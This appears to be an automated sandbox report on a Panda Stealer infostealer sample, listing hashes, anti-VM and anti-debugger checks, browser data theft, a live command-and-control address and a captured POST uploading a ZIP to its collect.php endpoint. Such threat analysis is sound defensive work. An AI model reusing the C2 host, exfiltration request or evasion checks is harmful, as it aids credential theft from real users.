Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
27-01-2024 03:13
Behavioral task
behavioral1
Sample
7921941dfa8e0c8279ffa1e4fff1a654.exe
Resource
win7-20231215-en
General
-
Target
7921941dfa8e0c8279ffa1e4fff1a654.exe
-
Size
2.9MB
-
MD5
7921941dfa8e0c8279ffa1e4fff1a654
-
SHA1
4f505603cb319773633acba645ca754037df9e16
-
SHA256
69ceba8b39719c757096d6979c8100c4a281efb253b995cfe4477ac174898383
-
SHA512
e7e6cdb1b9727169f5d96a941f277a2d6d47b3625e2e77da99cecec39f4adf9ba66d834d4728d278141ec8745a400edc78afc87579cb1f81967956e30cf6c8f2
-
SSDEEP
49152:8+8IPBm/7iZBbxqCghyHfMm+UbE9ETZOIC7pR0eyb1CDDoiu2kVwcVHR7eA7+VSz:8+/S2v9QIfFEsOICNOeSCD8i1qHZeA7x
Malware Config
Extracted
pandastealer
l�$����
http://
Extracted
pandastealer
1.11
http://f0567127.xsph.ru
Signatures
-
Panda Stealer payload 8 IoCs
resource yara_rule behavioral1/memory/1964-3-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-4-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-5-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-6-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-7-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-8-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-9-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer behavioral1/memory/1964-27-0x00000000000E0000-0x0000000000830000-memory.dmp family_pandastealer -
PandaStealer
Panda Stealer is a fork of CollectorProject Stealer written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7921941dfa8e0c8279ffa1e4fff1a654.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7921941dfa8e0c8279ffa1e4fff1a654.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7921941dfa8e0c8279ffa1e4fff1a654.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1964-0-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-2-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-3-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-4-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-5-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-6-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-7-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-8-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-9-0x00000000000E0000-0x0000000000830000-memory.dmp themida behavioral1/memory/1964-27-0x00000000000E0000-0x0000000000830000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7921941dfa8e0c8279ffa1e4fff1a654.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1964 7921941dfa8e0c8279ffa1e4fff1a654.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1964 7921941dfa8e0c8279ffa1e4fff1a654.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7921941dfa8e0c8279ffa1e4fff1a654.exe"C:\Users\Admin\AppData\Local\Temp\7921941dfa8e0c8279ffa1e4fff1a654.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1964
Network
-
Remote address:8.8.8.8:53Requestf0567127.xsph.ruIN AResponsef0567127.xsph.ruIN A141.8.197.42
-
Remote address:141.8.197.42:80RequestPOST /collect.php HTTP/1.1
Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
User-Agent: uploader
Host: f0567127.xsph.ru
Content-Length: 389050
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 400 Bad Request
Date: Sat, 27 Jan 2024 03:14:09 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
-
401.0kB 6.5kB 293 155
HTTP Request
POST http://f0567127.xsph.ru/collect.phpHTTP Response
400